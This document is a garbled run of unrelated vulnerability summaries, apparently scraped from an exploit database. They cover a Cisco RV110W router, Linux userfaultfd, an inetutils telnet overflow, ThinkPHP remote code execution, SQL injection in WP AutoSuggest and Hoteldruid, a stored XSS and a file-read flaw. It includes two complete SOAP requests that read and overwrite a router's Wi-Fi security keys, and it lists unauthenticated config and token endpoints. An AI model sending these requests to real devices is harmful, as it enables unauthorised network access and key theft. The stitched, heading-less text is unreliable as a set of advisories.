This exploit allows an attacker to gain access to the credentials of the Cisco RV110W router and execute OS commands on the device.
Using the userfaultfd API, it is possible to first register a userfaultfd region for any VMA that fulfills vma_can_userfault(): it must be an anonymous VMA (->vm_ops==NULL), a hugetlb VMA (VM_HUGETLB), or a shmem VMA (->vm_ops==shmem_vm_ops). This means that it is, for example, possible to register userfaultfd regions for shared read-only mappings of tmpfs files. Afterwards, the userfaultfd API can be used on such a region to (atomically) write data into holes in the file's mapping. This API also works on read-only shared mappings. This means that an attacker with read-only access to a tmpfs file that contains holes can write data into those holes.
GNU inetutils is vulnerable to a stack overflow in the client-side environment variable handling, which can be exploited to escape restricted shells on embedded devices. Most modern browsers no longer support telnet:// handlers, but in instances where a URI handler is configured to invoke the inetutils telnet client, this issue may be remotely triggerable. A stack-based overflow is present in telnet.c's handling of environment variables when connecting to remote telnet servers, triggered by oversized DISPLAY arguments. A heap overflow is also present in a different code path, triggered by supplying oversized environment variables during the client connection code.
A remote code execution vulnerability exists in ThinkPHP 5.x below v5.0.23 and v5.1.31. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The request contains a payload that will execute arbitrary code on the server.
A vulnerability exists in WP AutoSuggest 0.24, where an attacker can inject malicious SQL queries via the 'wpas_keys' parameter in the 'autosuggest.php' file. An attacker can exploit this vulnerability by using a tool such as sqlmap to inject malicious SQL queries and gain access to the database.
Hoteldruid is an open source program for hotel management (property management software) developed by DigitalDruid.Net. The 'id_utente_mod' parameter is vulnerable to SQL injection.
A stored cross-site scripting vulnerability exists in the 'Text Data' field within the 'ViewForumMessage' section, because the application does not properly sanitise user input.
The vulnerability lies in the tools accessible to the administrator user. It exists because the application performs no bounds check on absolute paths: if an absolute path is supplied to the vulnerable URL, the application reads that path and returns the contents of the requested file. Because the application does not sanitize user input, a normal authenticated user can exploit this vulnerability.
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>

and

POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
It was observed that the web application running on the router allows unauthenticated access to sensitive files on the web server. By sending a simple GET request without an authentication cookie, one receives valid responses. Other accessible resources are: /config/dialup/config.xml, /config/global/config.xml, /config/global/net-type.xml, /config/lan/config.xml, /config/pcassistant/config.xml, /config/voice/config.xml, /config/wifi/configure.xml. It was also observed that an unauthenticated user can obtain a "SessionID" and a "__RequestVerificationToken" by simply sending an HTTP GET request to "/api/webserver/SesTokInfo". Although these tokens might not give the user full access to the router, they can be used to reach several restricted resources on the router.